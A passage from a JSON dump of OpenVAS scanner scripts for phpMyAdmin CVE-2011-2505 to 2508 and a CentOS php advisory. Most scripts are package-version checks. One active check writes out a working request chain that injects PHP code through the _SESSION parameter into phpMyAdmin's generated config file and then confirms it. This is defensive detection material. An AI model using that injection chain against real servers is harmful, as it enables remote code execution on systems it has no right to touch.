\"CVE-2011-2507\", \"CVE-2011-2508\");\n script_name(\"FreeBSD Ports: phpmyadmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: phpmyadmin\n\nCVE-2011-2505\nlibraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication\nfeature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1\nassigns values to arbitrary parameters referenced in the query string,\nwhich allows remote attackers to modify the SESSION superglobal array\nvia a crafted request, related to a 'remote variable manipulation\nvulnerability.'\n\nCVE-2011-2506\nsetup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2\nand 3.4.x before 3.4.3.1 does not properly restrict the presence of\ncomment closing delimiters, which allows remote attackers to conduct\nstatic code injection attacks by leveraging the ability to modify the\nSESSION superglobal array.\n\nCVE-2011-2507\nlibraries/server_synchronize.lib.php in the Synchronize implementation\nin phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not\nproperly quote regular expressions, which allows remote authenticated\nusers to inject a PCRE e (aka PREG_REPLACE_EVAL) modifier, and\nconsequently execute arbitrary PHP code, by leveraging the ability to\nmodify the SESSION superglobal array.\n\nCVE-2011-2508\nDirectory traversal vulnerability in libraries/display_tbl.lib.php in\nphpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1, when a\ncertain MIME transformation feature is enabled, allows remote\nauthenticated users to include and execute arbitrary local files via a\n.. (dot dot) in a GLOBALS[mime_map][$meta->name][transformation]\nparameter.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/7e4e5c53-a56c-11e0-b180-00216aa06fc2.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"phpmyadmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.4.3.1\")<0) {\n txt += 'Package phpmyadmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-02T21:13:36", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "FreeBSD Ports: phpmyadmin", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2017-02-25T00:00:00", "id": "OPENVAS:69995", "href": "http://plugins.openvas.org/nasl.php?oid=69995", "sourceData": "#\n#VID 7e4e5c53-a56c-11e0-b180-00216aa06fc2\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 7e4e5c53-a56c-11e0-b180-00216aa06fc2\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following package is affected: phpmyadmin\n\nCVE-2011-2505\nlibraries/auth/swekey/swekey.auth.lib.php in the Swekey authentication\nfeature in phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1\nassigns values to arbitrary parameters referenced in the query string,\nwhich allows remote attackers to modify the SESSION superglobal array\nvia a crafted request, related to a 'remote variable manipulation\nvulnerability.'\n\nCVE-2011-2506\nsetup/lib/ConfigGenerator.class.php in phpMyAdmin 3.x before 3.3.10.2\nand 3.4.x before 3.4.3.1 does not properly restrict the presence of\ncomment closing delimiters, which allows remote attackers to conduct\nstatic code injection attacks by leveraging the ability to modify the\nSESSION superglobal array.\n\nCVE-2011-2507\nlibraries/server_synchronize.lib.php in the Synchronize implementation\nin phpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1 does not\nproperly quote regular expressions, which allows remote authenticated\nusers to inject a PCRE e (aka PREG_REPLACE_EVAL) modifier, and\nconsequently execute arbitrary PHP code, by leveraging the ability to\nmodify the SESSION superglobal array.\n\nCVE-2011-2508\nDirectory traversal vulnerability in libraries/display_tbl.lib.php in\nphpMyAdmin 3.x before 3.3.10.2 and 3.4.x before 3.4.3.1, when a\ncertain MIME transformation feature is enabled, allows remote\nauthenticated users to include and execute arbitrary local files via a\n.. (dot dot) in a GLOBALS[mime_map][$meta->name][transformation]\nparameter.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\nhttp://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\nhttp://www.vuxml.org/freebsd/7e4e5c53-a56c-11e0-b180-00216aa06fc2.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(69995);\n script_version(\"$Revision: 5424 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-25 17:52:36 +0100 (Sat, 25 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\");\n script_name(\"FreeBSD Ports: phpmyadmin\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"phpmyadmin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.4.3.1\")<0) {\n txt += 'Package phpmyadmin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:40:00", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2011-07-18T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2011-9144", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863362", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863362", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-9144\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062719.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863362\");\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-18 15:23:56 +0200 (Mon, 18 Jul 2011)\");\n script_xref(name:\"FEDORA\", value:\"2011-9144\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-9144\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'phpMyAdmin'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"phpMyAdmin on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.3.1~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-06T16:46:22", "description": "phpMyAdmin is prone to multiple remote vulnerabilities, including PHP\ncode-execution and local file-include vulnerabilities.\n\nSuccessful attacks can compromise the affected application and\npossibly the underlying computer.\n\nphpMyAdmin versions prior to 3.3.10.2 and 3.4.3.1 are vulnerable.", "cvss3": {}, "published": "2011-07-11T00:00:00", "type": "openvas", "title": "phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310103188", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103188", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:phpmyadmin:phpmyadmin\";\n\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103188\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2011-07-11 14:09:04 +0200 (Mon, 11 Jul 2011)\");\n script_bugtraq_id(48563);\n script_cve_id(\"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_name(\"phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/48563\");\n script_xref(name:\"URL\", value:\"http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/index.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\");\n script_xref(name:\"URL\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\");\n script_xref(name:\"URL\", value:\"http://typo3.org/teams/security/security-bulletins/typo3-sa-2011-008/\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"secpod_phpmyadmin_detect_900129.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"phpMyAdmin/installed\");\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more information.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"phpMyAdmin is prone to multiple remote vulnerabilities, including PHP\ncode-execution and local file-include vulnerabilities.\n\nSuccessful attacks can compromise the affected application and\npossibly the underlying computer.\n\nphpMyAdmin versions prior to 3.3.10.2 and 3.4.3.1 are vulnerable.\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif(!port = get_app_port(cpe:CPE))exit(0);\nif(!dir = get_app_location(cpe:CPE, port:port))exit(0);\n\nurl = string(dir, \"/setup/index.php\");\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(buf =~ \"HTTP/1.. 404\" || \"Cannot load or save configuration\" >< buf)exit(0);\n\nc = eregmatch(pattern:\"phpMyAdmin=([^;]+)\", string:buf);\nif(isnull(c[1]))exit(0);\ncookie = c[1];\n\nt = eregmatch(pattern:'(token=|token\" value=\")([0-9a-f]{32})', string:buf);\nif(isnull(t[2]))exit(0);\ntoken = t[2];\n\nvt_strings = get_vt_strings();\nhost = http_host_name(port:port);\n\nreq = string(\"GET \",dir,\"/?_SESSION[ConfigFile][Servers][*/print+%22\",vt_strings[\"lowercase\"],\"%22%3B/*][port]=0&session_to_unset=x&token=\",token,\" HTTP/1.1\\r\\n\",\n \"Host: \",host,\"\\r\\n\",\n \"Accept: */*\\r\\n\",\n \"Cookie: phpMyAdmin=\",cookie,\"\\r\\n\",\n \"\\r\\n\");\n\nrcv = http_send_recv(port:port, data:req);\n\nif(rcv !~ \"^HTTP/1\\.[01] 200\")exit(0);\n\nreq = string(\"POST \",dir,\"/setup/config.php HTTP/1.1\\r\\n\",\n \"Host: \",host,\"\\r\\n\",\n \"Accept: */*\\r\\n\",\n \"Cookie: phpMyAdmin=\",cookie,\"\\r\\n\",\n \"Content-Length: 55\\r\\n\",\n \"Content-Type: application/x-www-form-urlencoded\\r\\n\",\n \"\\r\\n\",\n \"submit_save=Save&token=\",token,\"\\r\\n\");\n\nrcv = http_send_recv(port:port, data:req);\n\nurl = string(dir, \"/config/config.inc.php\");\nreq = http_get(item:url, port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(vt_strings[\"lowercase\"] >< buf) {\n security_message(port:port);\n exit(0);\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:55:47", "description": "Check for the Version of phpMyAdmin", "cvss3": {}, "published": "2011-07-18T00:00:00", "type": "openvas", "title": "Fedora Update for phpMyAdmin FEDORA-2011-9144", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2508", "CVE-2011-2505", "CVE-2011-2506", "CVE-2011-2507"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863362", "href": "http://plugins.openvas.org/nasl.php?oid=863362", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for phpMyAdmin FEDORA-2011-9144\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"phpMyAdmin is a tool written in PHP intended to handle the administration of\n MySQL over the World Wide Web. Most frequently used operations are supported\n by the user interface (managing databases, tables, fields, relations, indexes,\n users, permissions), while you still have the ability to directly execute any\n SQL statement.\n\n Features include an intuitive web interface, support for most MySQL features\n (browse and drop databases, tables, views, fields and indexes, create, copy,\n drop, rename and alter databases, tables, fields and indexes, maintenance\n server, databases and tables, with proposals on server configuration, execute,\n edit and bookmark any SQL-statement, even batch-queries, manage MySQL users\n and privileges, manage stored procedures and triggers), import data from CSV\n and SQL, export data to various formats: CSV, SQL, XML, PDF, OpenDocument Text\n and Spreadsheet, Word, Excel, LATEX and others, administering multiple servers,\n creating PDF graphics of your database layout, creating complex queries using\n Query-by-example (QBE), searching globally in a database or a subset of it,\n transforming stored data into any format using a set of predefined functions,\n like displaying BLOB-data as image or download-link and much more...\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"phpMyAdmin on Fedora 14\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-July/062719.html\");\n script_id(863362);\n script_cve_id(\"CVE-2011-2505\",\"CVE-2011-2506\",\"CVE-2011-2507\",\"CVE-2011-2508\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-07-18 15:23:56 +0200 (Mon, 18 Jul 2011)\");\n script_xref(name: \"FEDORA\", value: \"2011-9144\");\n script_name(\"Fedora Update for phpMyAdmin FEDORA-2011-9144\");\n\n script_summary(\"Check for the Version of phpMyAdmin\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"phpMyAdmin\", rpm:\"phpMyAdmin~3.4.3.1~1.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:55:21", "description": "Check for the Version of php", "cvss3": {}, "published": "2011-08-09T00:00:00", "type": "openvas", "title": "CentOS Update for php CESA-2010:0919 centos5 i386", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2531", "CVE-2010-3065", "CVE-2010-3870", "CVE-2009-5016", "CVE-2010-1917", "CVE-2010-1128", "CVE-2010-0397"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:880633", "href": "http://plugins.openvas.org/nasl.php?oid=880633", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for php CESA-2010:0919 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP is an HTML-embedded scripting language commonly used with the Apache\n HTTP Server.\n\n An input validation flaw was discovered in the PHP session serializer. If a\n PHP script generated session variable names from untrusted user input, a\n remote attacker could use this flaw to inject an arbitrary variable into\n the PHP session. (CVE-2010-3065)\n \n An information leak flaw was discovered in the PHP var_export() function\n implementation. If some fatal error occurred during the execution of this\n function (such as the exhaustion of memory or script execution time limit),\n part of the function's output was sent to the user as script output,\n possibly leading to the disclosure of sensitive information.\n (CVE-2010-2531)\n \n A numeric truncation error and an input validation flaw were found in the\n way the PHP utf8_decode() function decoded partial multi-byte sequences\n for some multi-byte encodings, sending them to output without them being\n escaped. An attacker could use these flaws to perform a cross-site\n scripting attack. (CVE-2009-5016, CVE-2010-3870)\n \n It was discovered that the PHP lcg_value() function used insufficient\n entropy to seed the pseudo-random number generator. A remote attacker could\n possibly use this flaw to predict values returned by the function, which\n are used to generate session identifiers by default. This update changes\n the function's implementation to use more entropy during seeding.\n (CVE-2010-1128)\n \n It was discovered that the PHP fnmatch() function did not restrict the\n length of the pattern argument. A remote attacker could use this flaw to\n crash the PHP interpreter where a script used fnmatch() on untrusted\n matching patterns. (CVE-2010-1917)\n \n A NULL pointer dereference flaw was discovered in the PHP XML-RPC\n extension. A malicious XML-RPC client or server could use this flaw to\n crash the PHP interpreter via a specially-crafted XML-RPC request.\n (CVE-2010-0397)\n \n All php users should upgrade to these updated packages, which contain\n backported patches to resolve these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"php on CentOS 5\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-November/017198.html\");\n script_id(880633);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2010:0919\");\n script_cve_id(\"CVE-2009-5016\", \"CVE-2010-0397\", \"CVE-2010-1128\", \"CVE-2010-1917\", \"CVE-2010-2531\", \"CVE-2010-3065\", \"CVE-2010-3870\");\n script_name(\"CentOS Update for php CESA-2010:0919 centos5 i386\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-bcmath\", rpm:\"php-bcmath~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-cli\", rpm:\"php-cli~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-common\", rpm:\"php-common~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-dba\", rpm:\"php-dba~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-devel\", rpm:\"php-devel~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-gd\", rpm:\"php-gd~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-imap\", rpm:\"php-imap~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ldap\", rpm:\"php-ldap~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mbstring\", rpm:\"php-mbstring~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-mysql\", rpm:\"php-mysql~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-ncurses\", rpm:\"php-ncurses~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-odbc\", rpm:\"php-odbc~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"php-pdo\", rpm:\"php-pdo~5.1.6~27.el5_5.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if 